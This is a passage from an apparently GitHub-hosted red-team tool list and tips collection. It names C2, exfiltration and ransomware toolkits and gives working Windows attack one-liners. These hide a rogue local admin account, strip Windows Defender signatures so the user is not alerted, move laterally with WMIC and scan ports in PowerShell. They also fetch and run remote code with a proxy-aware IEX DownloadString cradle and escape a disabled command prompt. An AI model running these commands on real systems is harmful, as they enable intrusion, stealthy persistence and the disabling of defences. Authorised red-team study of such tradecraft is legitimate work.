href="#wmiops">WMIOps</a></b><i> WMI remote commands</i></li> </ul> </ul> </details> <details open=""> <summary><b>Collection</b> 3 tools</summary> <ul dir="auto"> <ul dir="auto"> <li><b><a href="#bloodhound">BloodHound</a></b><i> Active directory visualisation</i></li> <li><b><a href="#snaffler">Snaffler</a></b><i> Active directory credential collector</i></li> <li><b><a href="#linwinpwn">linWinPwn</a></b><i> Active Directory Enumeration and Vulnerability checks</i></li> </ul> </ul> </details> <details open=""> <summary><b>Command and Control</b> 9 tools</summary> <ul dir="auto"> <ul dir="auto"> <li><b><a href="#living-off-trusted-sites-project">Living Off Trusted Sites Project</a></b><i> Leverage legitimate domains for your C2</i></li> <li><b><a href="#havoc">Havoc</a></b><i> Command and control framework</i></li> <li><b><a href="#covenant">Covenant</a></b><i> Command and control framework (.NET)</i></li> <li><b><a href="#merlin">Merlin</a></b><i> Command and control framework (Golang)</i></li> <li><b><a href="#metasploit-framework">Metasploit Framework</a></b><i> Command and control framework (Ruby)</i></li> <li><b><a href="#pupy">Pupy</a></b><i> Command and control framework (Python)</i></li> <li><b><a href="#brute-ratel">Brute Ratel</a></b><i> Command and control framework ($$$)</i></li> <li><b><a href="#nimplant">NimPlant</a></b><i> C2 implant written in Nim</i></li> <li><b><a href="#hoaxshell">Hoaxshell</a></b><i> PowerShell reverse shell</i></li> </ul> </ul> </details> <details open=""> <summary><b>Exfiltration</b> 5 tools</summary> <ul dir="auto"> <ul dir="auto"> <li><b><a href="#dnscat2">Dnscat2</a></b><i> C2 via DNS tunneling</i></li> <li><b><a href="#cloakify">Cloakify</a></b><i> Data transformation for exfiltration</i></li> <li><b><a href="#pyexfil">PyExfil</a></b><i> Data exfiltration PoC</i></li> <li><b><a href="#powershell-rat">Powershell RAT</a></b><i> Python based backdoor</i></li> <li><b><a href="#gd-thief">GD-Thief</a></b><i> Google drive exfiltration</i></li> </ul> </ul> </details> <details open=""> <summary><b>Impact</b> 4 tools</summary> <ul dir="auto"> <ul dir="auto"> <li><b><a href="#conti-pentester-guide-leak">Conti Pentester Guide Leak</a></b><i> Conti ransomware group affilate toolkit</i></li> <li><b><a href="#slowloris">SlowLoris</a></b><i> Simple denial of service</i></li> <li><b><a href="#usbkill">usbkill</a></b><i> Anti-forensic kill-switch</i></li> <li><b><a href="#keytap">Keytap</a></b><i> Get pressed keyboard keys from typing audio</i></li> </ul> </ul> </details> <div class="markdown-heading" dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">Red Team Tips</h1><a id="user-content-red-team-tips" class="anchor" aria-label="Permalink: Red Team Tips" href="#red-team-tips"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto"><em>Learn from Red Teamers with a collection of Red Teaming Tips. These tips cover a range of tactics, tools, and methodologies to improve your red teaming abilities.</em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Improved HTML smuggling with mouse move eventlistener</h3><a id="user-content-improved-html-smuggling-with-mouse-move-eventlistener" class="anchor" aria-label="Permalink: 🔙Improved HTML smuggling with mouse move eventlistener" href="#improved-html-smuggling-with-mouse-move-eventlistener"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto"><strong>Description:</strong> <em>'Qakbot added an EventListener for mouse movement to the HTML smuggling attachment for anti evasion in sandbox's the zip wont drop.'</em></p> <p dir="auto"><strong>Credit:</strong> <a href="https://x.com/pr0xylife" rel="nofollow">@pr0xylife</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://x.com/pr0xylife/status/1598410732516802563" rel="nofollow">Twitter</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Google translate for phishing</h3><a id="user-content-google-translate-for-phishing" class="anchor" aria-label="Permalink: 🔙Google translate for phishing" href="#google-translate-for-phishing"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto"><strong>Description:</strong> <em>Successful phishing page credential stealing being proxied via the google translate page view functionality.</em></p> <p dir="auto"><strong>Credit:</strong> <a href="https://x.com/malmoeb" rel="nofollow">@malmoeb</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://x.com/malmoeb/status/1671106885590630400" rel="nofollow">Twitter</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Hiding the local admin account</h3><a id="user-content-hiding-the-local-admin-account" class="anchor" aria-label="Permalink: 🔙Hiding the local admin account" href="#hiding-the-local-admin-account"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /t REG_DWORD /v alh4zr3d /d 0 /f"><pre>reg add <span class="pl-s"><span class="pl-pds">"</span>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList<span class="pl-pds">"</span></span> /t REG_DWORD /v alh4zr3d /d 0 /f</pre></div> <p dir="auto"><strong>Description:</strong> <em>'Creating accounts is risky when evading blue, but when creating a local admin, use some cute sorcery in the registry to hide it.'</em></p> <p dir="auto"><strong>Credit:</strong> <a href="https://twitter.com/Alh4zr3d" rel="nofollow">@Alh4zr3d</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://twitter.com/Alh4zr3d/status/1612913838999113728" rel="nofollow">Twitter</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Cripple windows defender by deleting signatures</h3><a id="user-content-cripple-windows-defender-by-deleting-signatures" class="anchor" aria-label="Permalink: 🔙Cripple windows defender by deleting signatures" href="#cripple-windows-defender-by-deleting-signatures"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content=""%Program Files%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"><pre><span class="pl-s"><span class="pl-pds">"</span>%Program Files%\Windows Defender\MpCmdRun.exe<span class="pl-pds">"</span></span> -RemoveDefinitions -All</pre></div> <p dir="auto"><strong>Description:</strong> <em>'A bit messy, but if Windows Defender is causing you a big headache, rather than disabling it (which alerts the user), you should just neuter it by deleting all the signatures.'</em></p> <p dir="auto"><strong>Credit:</strong> <a href="https://twitter.com/Alh4zr3d" rel="nofollow">@Alh4zr3d</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://twitter.com/Alh4zr3d/status/1611005101262389250" rel="nofollow">Twitter</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Enable multiple RDP sessions per user</h3><a id="user-content-enable-multiple-rdp-sessions-per-user" class="anchor" aria-label="Permalink: 🔙Enable multiple RDP sessions per user" href="#enable-multiple-rdp-sessions-per-user"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="reg add HKLM\System\CurrentControlSet\Control\TerminalServer /v fSingleSessionPerUser /d 0 /f"><pre>reg add HKLM<span class="pl-cce">\S</span>ystem<span class="pl-cce">\C</span>urrentControlSet<span class="pl-cce">\C</span>ontrol<span class="pl-cce">\T</span>erminalServer /v fSingleSessionPerUser /d 0 /f</pre></div> <p dir="auto"><strong>Description:</strong> <em>'Sometimes you want to log in to a host via RDP or similar, but your user has an active session. Enable multiple sessions per user.'</em></p> <p dir="auto"><strong>Credit:</strong> <a href="https://twitter.com/Alh4zr3d" rel="nofollow">@Alh4zr3d</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://twitter.com/Alh4zr3d/status/1609954528425558016" rel="nofollow">Twitter</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Sysinternals PsExec.exe local alternative</h3><a id="user-content-sysinternals-psexecexe-local-alternative" class="anchor" aria-label="Permalink: 🔙Sysinternals PsExec.exe local alternative" href="#sysinternals-psexecexe-local-alternative"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c " command ""><pre>wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c <span class="pl-s"><span class="pl-pds">"</span> command <span class="pl-pds">"</span></span></pre></div> <p dir="auto"><strong>Description:</strong> <em>'Are you tired of uploading Sysinternals PsExec.exe when doing lateral movement? Windows has a better alternative preinstalled. Try this instead.'</em></p> <p dir="auto"><strong>Credit:</strong> <a href="https://twitter.com/GuhnooPlusLinux" rel="nofollow">@GuhnooPlusLinux</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://twitter.com/GuhnooPlusLinux/status/1607473627922063360" rel="nofollow">Twitter</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Live off the land port scanner</h3><a id="user-content-live-off-the-land-port-scanner" class="anchor" aria-label="Permalink: 🔙Live off the land port scanner" href="#live-off-the-land-port-scanner"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(<tgt_ip>,$_)) "Port $_ open"} 2>$null"><pre>0..65535 <span class="pl-k">|</span> % {echo <span class="pl-s"><span class="pl-pds">((</span>new<span class="pl-k">-</span>object Net.Sockets.TcpClient).Connect(<span class="pl-k"><</span>tgt_ip<span class="pl-k">>,</span><span class="pl-smi">$_</span><span class="pl-pds">))</span></span> <span class="pl-s"><span class="pl-pds">"</span>Port <span class="pl-smi">$_</span> open<span class="pl-pds">"</span></span>} <span class="pl-k">2></span><span class="pl-smi">$null</span></pre></div> <p dir="auto"><strong>Description:</strong> <em>'When possible, live off the land rather than uploading tools to machines (for many reasons). PowerShell/.NET help. Ex: simple port scanner in Powershell.'</em></p> <p dir="auto"><strong>Credit:</strong> <a href="https://twitter.com/Alh4zr3d" rel="nofollow">@Alh4zr3d</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://twitter.com/Alh4zr3d/status/1605060950339588096" rel="nofollow">Twitter</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Proxy aware PowerShell DownloadString</h3><a id="user-content-proxy-aware-powershell-downloadstring" class="anchor" aria-label="Permalink: 🔙Proxy aware PowerShell DownloadString" href="#proxy-aware-powershell-downloadstring"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString("<url>")"><pre><span class="pl-smi">$w</span>=(New-Object Net.WebClient)<span class="pl-k">;</span><span class="pl-smi">$w</span>.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials<span class="pl-k">;</span>IEX <span class="pl-smi">$w</span>.DownloadString(<span class="pl-s"><span class="pl-pds">"</span><url><span class="pl-pds">"</span></span>)</pre></div> <p dir="auto"><strong>Description:</strong> <em>'Most large orgs are using web proxies these days. The standard PowerShell download cradle is not proxy aware. Use this one.'</em></p> <p dir="auto"><strong>Credit:</strong> <a href="https://twitter.com/Alh4zr3d" rel="nofollow">@Alh4zr3d</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://twitter.com/Alh4zr3d/status/1596192664398966785" rel="nofollow">Twitter</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Looking for internal endpoints in browser bookmarks</h3><a id="user-content-looking-for-internal-endpoints-in-browser-bookmarks" class="anchor" aria-label="Permalink: 🔙Looking for internal endpoints in browser bookmarks" href="#looking-for-internal-endpoints-in-browser-bookmarks"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="type "C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak" | findstr /c "name url" | findstr /v "type""><pre><span class="pl-c1">type</span> <span class="pl-s"><span class="pl-pds">"</span>C:\Users\%USERNAME%\AppData\Local\Google\Chrome\User Data\Default\Bookmarks.bak<span class="pl-pds">"</span></span> <span class="pl-k">|</span> findstr /c <span class="pl-s"><span class="pl-pds">"</span>name url<span class="pl-pds">"</span></span> <span class="pl-k">|</span> findstr /v <span class="pl-s"><span class="pl-pds">"</span>type<span class="pl-pds">"</span></span></pre></div> <p dir="auto"><strong>Description:</strong> <em>'You'd be surprised what you can find out from a user's bookmarks alone. Internal endpoints they can access, for instance.'</em></p> <p dir="auto"><strong>Credit:</strong> <a href="https://twitter.com/Alh4zr3d" rel="nofollow">@Alh4zr3d</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://twitter.com/Alh4zr3d/status/1595488676389171200" rel="nofollow">Twitter</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Query DNS records for enumeration</h3><a id="user-content-query-dns-records-for-enumeration" class="anchor" aria-label="Permalink: 🔙Query DNS records for enumeration" href="#query-dns-records-for-enumeration"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="Get-DnsRecord -RecordType A -ZoneName FQDN -Server <server hostname>"><pre>Get-DnsRecord -RecordType A -ZoneName FQDN -Server <span class="pl-k"><</span>server hostname<span class="pl-k">></span></pre></div> <p dir="auto"><strong>Description:</strong> <em>'Enumeration is 95% of the game. However, launching tons of scans to evaluate the environment is very loud. Why not just ask the DC/DNS server for all DNS records?'</em></p> <p dir="auto"><strong>Credit:</strong> <a href="https://twitter.com/Alh4zr3d" rel="nofollow">@Alh4zr3d</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://twitter.com/Alh4zr3d/status/1587132627823181824" rel="nofollow">Twitter</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Unquoted service paths without PowerUp</h3><a id="user-content-unquoted-service-paths-without-powerup" class="anchor" aria-label="Permalink: 🔙Unquoted service paths without PowerUp" href="#unquoted-service-paths-without-powerup"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name"><pre>Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode <span class="pl-k">|</span> Where {<span class="pl-smi">$_</span>.StartMode -eq <span class="pl-s"><span class="pl-pds">"</span>Auto<span class="pl-pds">"</span></span> -and <span class="pl-smi">$_</span>.PathName -notlike <span class="pl-s"><span class="pl-pds">"</span>C:\Windows*<span class="pl-pds">"</span></span> -and <span class="pl-smi">$_</span>.PathName -notlike <span class="pl-s"><span class="pl-pds">'</span>"*<span class="pl-pds">'</span></span>} <span class="pl-k">|</span> <span class="pl-k">select</span> <span class="pl-smi">PathName,DisplayName,Name</span></pre></div> <p dir="auto"><strong>Description:</strong> <em>'Finding unquoted service paths without PowerUp'</em></p> <p dir="auto"><strong>Credit:</strong> <a href="https://twitter.com/Alh4zr3d" rel="nofollow">@Alh4zr3d</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://twitter.com/Alh4zr3d/status/1579254955554136064" rel="nofollow">Twitter</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Bypass a disabled command prompt with /k</h3><a id="user-content-bypass-a-disabled-command-prompt-with-k" class="anchor" aria-label="Permalink: 🔙Bypass a disabled command prompt with /k" href="#bypass-a-disabled-command-prompt-with-k"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Win+R (To bring up Run Box) cmd.exe /k "whoami""><pre><span class="pl-c"><span class="pl-c">#</span> Win+R (To bring up Run Box)</span> cmd.exe /k <span class="pl-s"><span class="pl-pds">"</span>whoami<span class="pl-pds">"</span></span></pre></div> <p dir="auto"><strong>Description:</strong> <em>'This command prompt has been disabled by your administrator...' Can usually be seen in environments such as kiosks PCs, a quick hacky work around is to use /k via the windows run box. This will carry out the command and then show the restriction message, allowing for command execution.</em></p> <p dir="auto"><strong>Credit:</strong> Martin Sohn Christensen</p> <p dir="auto"><strong>Link:</strong> <a href="https://improsec.com/tech-blog/the-command-prompt-has-been-disabled-by-your-administrator-press-any-key-to-continue-or-use-these-weird-tricks-to-bypass-admins-will-hate-you" rel="nofollow">Blog</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Stop windows defender deleting mimikatz.exe</h3><a id="user-content-stop-windows-defender-deleting-mimikatzexe" class="anchor" aria-label="Permalink: 🔙Stop windows defender deleting mimikatz.exe" href="#stop-windows-defender-deleting-mimikatzexe"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 